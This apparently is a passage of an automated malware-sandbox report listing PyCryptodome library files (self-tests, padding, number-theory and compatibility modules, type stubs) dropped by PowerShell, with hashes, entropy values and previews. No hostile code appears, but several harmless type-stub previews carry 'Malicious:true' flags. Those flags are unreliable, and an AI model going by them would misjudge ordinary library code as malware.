                                                                                                                                                                                                                              SHA1:969D906F42437AE85CA9B0A1A238BE65F5DE92EE
                                                                                                                                                                                                                              SHA-256:E4A05E28D9C8969F6DA32E60210261A2BC137AF776ABB02D7AF795CBA4D0806D
                                                                                                                                                                                                                              SHA-512:4C421A6CB23703935D72E3E1B46B24CE622BADC8FA87089AD4F28052C4B6BAC7D0BE358D1036C01961000CCD1F2FB2849950D16196FAE1CDCA6B11276678AC39
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.).zgSelf tests..These tests should perform quickly and can ideally be used every time an.application runs.......N)...import_module)...StringIOc...........................e.Z.d.Z.d...Z.y.)...SelfTestErrorc.....................N.....t.........j...................|.|.|...........|.|._.........|.|._.........y...N)...Exception..__init__..message..result)...selfr....r....s.... .IC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/SelfTest/__init__.pyr....z.SelfTestError.__init__&...s"...............4...&..1...................N)...__name__..__module__..__qualname__r......r....r....r....r....%...s...........r....r....c...........................|...i.}.t.........j...........................}.|.. |...t.........|...........}.|.j...................|...........n/|.."|.j...................|.j...................|.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):811
                                                                                                                                                                                                                              Entropy (8bit):5.4338310242836085
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:Vj5i/U8VBZvOBZri7FtEoGlWULDZCocGt/ZzKNBoabBYXMXk6O:Vb8GBZ27FQv8ocGBBKNBRbBYYk/
                                                                                                                                                                                                                              MD5:338D237893BB78745BD7FED487F45297
                                                                                                                                                                                                                              SHA1:A40C9E1168808CD5FB9158B40789371F66291997
                                                                                                                                                                                                                              SHA-256:E98F52587B3A57E3DFE2DF103B6BFFC1A546BFDF9364B3BCA3992132A46DBABE
                                                                                                                                                                                                                              SHA-512:3BDB927509822B515558CF8AAA91FD231AFAA61766230D6EB7C69795C140DA1D6EB9D511A8E7581FCDAF8C7E9EF524991FD6023E15B0103E88A7F96B6CE15192
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.VfL...............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.e.j...................v.Z.e.s...e.d...........d.e.j...................v.Z.e.r...e.d...........d.e.j...................v.r.d.Z.n.d.Z.e.e.d...Z...e.j...................e.j...................e.e.............y.)......)...print_functionN)...SelfTestz.--skip-slow-testsz.Skipping slow testsz.--wycheproof-warningsz.Printing Wycheproof warningsz.-v..........)...slow_tests..wycheproof_warnings)...stream..verbosity..config)...__future__r......sys..Cryptor......argvr......printr....r....r......run..stdout........IC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/SelfTest/__main__.py..<module>r........s|............&........%........1............. ..-........9...........(..)....3.8.8.......I....I..".;N..O............C.J.J.).F..Cr....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8143
                                                                                                                                                                                                                              Entropy (8bit):5.4775393957153025
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:D8k2g3kqopFqMbkYuwcTtyEwnG1cUiqBx/trZ:J3kTpFqMh388nCcUlrtrZ
                                                                                                                                                                                                                              MD5:87252CA1C029F3E09AFCD01DC15C6D40
                                                                                                                                                                                                                              SHA1:4F609A8D5C4E65915344A10E0CA0519940932ECA
                                                                                                                                                                                                                              SHA-256:C39706D73D3130E3129F6B60044900CF1F6FCF47059DD3316C73851D88E1D8EE
                                                                                                                                                                                                                              SHA-512:06B45DC93B951059F67E5B4FC93911F2DADB900556BD6EE544BB21AF1C70FB07B178CBFCE8C5F4131FC31FF98B8E7DF3618BA175092D33174BAE08CB85024193
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vfb .............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....d.d.l.Z.d.Z.d...Z.d...Z.i.i.i.f.d...Z.y.#.e.$.r...d.Z.Y...w.x.Y.w.)......N)...unhexlify)...FileNotFoundErrorTFc.....................:.....d.}.g.}...G.d...d.t.................}.d.}.d.}.d.}...|.d.z...}.|.j...........................}.|.s.|...|.j...................|.............|.S.|.j...........................}.|.j...................d.........s.|.s.d.}..T|.j...................d.........r'|...|.j...................|...........d.}.|.j...................|.............|.r(|.d.z...}.d.}.|...|.j...................|.............|.d.|.|.f.z...|.........}.t.........j...................d.|.........}.|.s.|.x.j...................|.g.z...c._.........n.|.j...................d.........j...........................}.|.j...................d.........j...........................}.|.j...................|.d.........}.|..7t.........|.........d.z...d.k7..r.d.|.z...}.t.........|.|.t.........j...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1589
                                                                                                                                                                                                                              Entropy (8bit):4.863921907034155
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:3FCxgFByvDGt+wvAYBMQvMLKNBxHn5uxmlIeQZDTR+iCia86qos9Q9RW3mLQnt1:3sOjybG8wviQvMoBxZnafRA/qos9QQt1
                                                                                                                                                                                                                              MD5:E5A07C125E66A9161DD18CD25D86A609
                                                                                                                                                                                                                              SHA1:44BFE3EC0530ECE8F59557AA4A654CF0D333404A
                                                                                                                                                                                                                              SHA-256:E5EB4C4AD89652A36D48F5430A92BAE99F29373E76276DA474E1E4E6D16DEE3E
                                                                                                                                                                                                                              SHA-512:D061727C1BD263FB4AF4AEB461E267EB06E325E39D4263DD1E101F05EF8B54F22E94320038A9FBA37B4149C7DF8836264569483AFA684CD1407718A8A6EC3AF3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf..........................<.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d...Z.d...Z.d...Z.y.).z%Common functions for SelfTest modules.....N)...bc.....................H.....t.........j...........................j...................|.........S.).z.Return a list of TestCase instances given a TestCase class.. This is useful when you have defined test* methods on your TestCase class.. )...unittest..TestLoader..loadTestsFromTestCase)...class_s.... .JC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/SelfTest/st_common.py..list_test_casesr.... ...s................... ..6..6.v..>..>.....c...........................t.........|.t.................r(t.........d.j...................|.j...........................................S.t.........d.........j...................|.j...................................S.).z,Remove whitespace from a text or byte string..)...isinstance..strr......join..split....ss.... r......strip_whitespacer....'...s?.........!.C......................#..$..$...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3292
                                                                                                                                                                                                                              Entropy (8bit):5.003098854081704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:MRwEIB0jcQHMsvI/S3oCFGAZUqjZibFduSmZpoRE3bpJ5U:MRwfFQHvo2Uq1cFYSYpCE3bpJ5U
                                                                                                                                                                                                                              MD5:25E5852A52182CBF645AC075BDE04C8E
                                                                                                                                                                                                                              SHA1:5431574C5E607B91EE33D90D2DBD52E6634622A5
                                                                                                                                                                                                                              SHA-256:E0D9B91A882D3986EF288761C85527F658E552B9A48B02AD630896A10B155F9B
                                                                                                                                                                                                                              SHA-512:8AE1F5A17386A33B2C6E4D9360C2CCFEA10549DCDDAA920919B12C8FF4975AAA536E759C5C98885E9863194381B3C9B1E40D935C2562C80786CC9EEAE238A4BD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# -*- coding: ascii -*-..#..# Util/Counter.py : Fast counter for use with CTR-mode ciphers..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):295
                                                                                                                                                                                                                              Entropy (8bit):4.705947008789207
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYBr0hxrMND0R2D9F6s/2F62LMJteOFr2gCUA2gA1MJFuJry:1REYBr0DI1RFF2FDLMJzZ2gCn2gA1gM4
                                                                                                                                                                                                                              MD5:48844D3840F12D7CC253481AEB936730
                                                                                                                                                                                                                              SHA1:2329321B884361FF52CD1E79D4ECD3ABD2C08309
                                                                                                                                                                                                                              SHA-256:7A86661370C3B894AEB4EDAD8755466DE52226588608A530F63F3E3379585AD0
                                                                                                                                                                                                                              SHA-512:06990D253057568DB8B16CAFF5599CD48FDE3100B5193213BD250BD1797D11F2A62C00D493AAC5CA60CD557514B3AC543454D9D50991B9EEAA735B3D6E3A7150
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4421
                                                                                                                                                                                                                              Entropy (8bit):5.191112640865006
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:e1tDqrYJALrYJHdt3EHGuI2gHdYUI1e+GJF37gR8C91/ErvyGAhQyAk:e1Vqrskrs9t3q/ILxF379aGyQyh
                                                                                                                                                                                                                              MD5:FBF391FD249DDBB1C32502AC42999B5D
                                                                                                                                                                                                                              SHA1:9559F22269BBE2A0F918705DED635B8CC666DD10
                                                                                                                                                                                                                              SHA-256:A04416E7AA698FFFC0301EE284720426B69E9A3BCB2A0C7E954A054698C29405
                                                                                                                                                                                                                              SHA-512:4241AEF302C010640C2FA86D92F2EE7EA34A865F759D14C02024F62A3452C593C0BCCABFE46043E879EB1CD73A290F85C0DD106A294684F628C100EA06382DF9
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#..# Util/Padding.py : Functions to manage padding..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SH
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):243
                                                                                                                                                                                                                              Entropy (8bit):4.823438083026704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYB0yqDLWJJni6Co6sRGcp5gUeQ/6sRGcp5/:1REYBkDyHZHRGe5VeQPRGe5/
                                                                                                                                                                                                                              MD5:72AE5A92A5B5373240F3184324E84F6B
                                                                                                                                                                                                                              SHA1:976AEA0ED87A3C086D068AE560FDB2FFCD591676
                                                                                                                                                                                                                              SHA-256:ED464B7B39D2481D2C4DE1FF908308ADF7F035B21B3F7A242E469F1BD173DEF6
                                                                                                                                                                                                                              SHA-512:27C15B7D76E180E1B65D566D8225C3661E78854515C9716A645C5F62E444B5A90AB61DDF92677B9C4A1276921711C281C814CAC60FA6D0BFC76A7716E4124613
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21578
                                                                                                                                                                                                                              Entropy (8bit):4.591349548627808
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:aPe4cRum4V+EE2tKm/8MboR6U/6LcleM6s4riu6gvZGVSRq67:DAfHQgRGVe37
                                                                                                                                                                                                                              MD5:73AEDFB55D3A90F08A29CC5D0AB7E623
                                                                                                                                                                                                                              SHA1:D576725EC2571123AFE056369B58063BFB9D7724
                                                                                                                                                                                                                              SHA-256:DFDB8CD578E00E485AD2070F24A3CFD7B0E75C972EBA73912B0BB59D8D67193B
                                                                                                                                                                                                                              SHA-512:BB63BA3D20FC92A942F16C35E0128AEB2810310F75778FD6218D037D40AFFFCF3E19FFADE08882C0EC781548EACB5588A5B5A964E96FC5753CF44A9053EAADFD
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# rfc1751.py : Converts between 128-bit strings and a human-readable..# sequence of words, as defined in RFC1751: "A Convention for..# Human-Readable 128-bit Keys", by Daniel L. McDonald...#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DA
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):166
                                                                                                                                                                                                                              Entropy (8bit):4.7074966574817525
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
                                                                                                                                                                                                                              MD5:0DE296D8A8547E04D6926C50733B2BE8
                                                                                                                                                                                                                              SHA1:00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
                                                                                                                                                                                                                              SHA-256:76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
                                                                                                                                                                                                                              SHA-512:1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3885
                                                                                                                                                                                                                              Entropy (8bit):4.815634844501543
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                                                                                                              MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                                                                                                              SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                                                                                                              SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                                                                                                              SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):97896
                                                                                                                                                                                                                              Entropy (8bit):4.090850897275891
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:EnYL5QeQEUkknbkEEpeoc06BsJ7rajyCJrOiVDtT5U1464iPpAji6R449qVnSPt4:0YTXrtNajhJrOs5uPqe6CJn6KEVama39
                                                                                                                                                                                                                              MD5:3602B83C3AC94CFAAFA24C3A8C41895B
                                                                                                                                                                                                                              SHA1:5F4C1EB93B011F12A117C509CE7A878420D19307
                                                                                                                                                                                                                              SHA-256:6CE48B150797316B1DC24B6AD759F0A3F2D3D6DA339E5BCCEDEC9342800450E5
                                                                                                                                                                                                                              SHA-512:BC2F5B9DEB7D7678A67092CCCB1BEEA42E2B6BD9E028F9764C675340E247A8967D7704F054A1E4035C9698C8F7DD4FB3548502E157892E2DE36ADF917C3BD311
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#..# number.py : Number-theoretic functions..#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling, Barry A. Warsaw, and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):994
                                                                                                                                                                                                                              Entropy (8bit):4.898132103946567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                                                                                                              MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                                                                                                              SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                                                                                                              SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                                                                                                              SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6010
                                                                                                                                                                                                                              Entropy (8bit):4.8279694547928065
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WKYFQHvoA6pDLeAIeCGtFaVBS3eKQM4ks58B1S9+Ow34eHPwAEx2pdDSSUSAJn7e:W9QHvilIUwpK5lBssOk4eldSE4n7R0ua
                                                                                                                                                                                                                              MD5:11D063AE5BC40D2D943DF399F95DDA04
                                                                                                                                                                                                                              SHA1:6D8C8391EEBDAE9FE2724F791B5D87A16E4D77CE
                                                                                                                                                                                                                              SHA-256:2CF7955872D7D8A23F12B9340AC867E8E342102FED7B80DBA25B6303D7992155
                                                                                                                                                                                                                              SHA-512:B2E2C98C03916DE5BB15F36B9A1972769825E1E514AFEA153AC292F3FFF716E589FCF009BD42459D5B7A35C456A3645F2D3D0E59DAFEF198563CDBF83F2B2245
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Util/py3compat.py : Compatibility code for handling Py3k / Python 2.x..#..# Written in 2010 by Thorsten Behrens..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWA
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):870
                                                                                                                                                                                                                              Entropy (8bit):4.791491758318878
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REgT3JtgPnrnIW9h3MnBbRFNU+U4Fu31954iEe1oHhASLjPMQ:pZtgMcUTkDTtoBjLt
                                                                                                                                                                                                                              MD5:E7EC097AA59EF78A17CCA1860BE69741
                                                                                                                                                                                                                              SHA1:A25E52635BA19E8324128B8900378458BDAA3AF2
                                                                                                                                                                                                                              SHA-256:A1913976F178C28B8A7C117093233AAC0D3E772C4876DA9C084382BB95F2AC2D
                                                                                                                                                                                                                              SHA-512:675F6249EF76BDA58D64ABF2BEB84DA58C04A4054F380BC3C2D63CA0D0CAB3342FB36A43925C6176D494F70AC1AEFD06DDB809F28F4A3412E857ACA1F42E6451
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .....def is_bytes(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .....def StringIO(s: str) -> IO[str]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5587
                                                                                                                                                                                                                              Entropy (8bit):4.7939511946106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWYIzbJRSTdOqvdJLb9YmPhv+h:9qrskrs9t3q/Ik8gqlRdhy
                                                                                                                                                                                                                              MD5:C08EBC91E1A45FED150F8E5608E2AF15
                                                                                                                                                                                                                              SHA1:80AAA3BF9159A68321B464D3DA455D3EB3713F36
                                                                                                                                                                                                                              SHA-256:3E36AE472CE5CFBA3B02DBF0CC2A132F868C6DA8002F5B8E895C873DDB79A029
                                                                                                                                                                                                                              SHA-512:ACD238B1FC40197C4EA5DAFABD79A2BDBE4BE684F4BC0AB4361EAAD16DA92220A80D26E805D2FDDE01295FF959A91F4A830EE02F4FCB91F3BB0DEDBA295C01CD
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):249
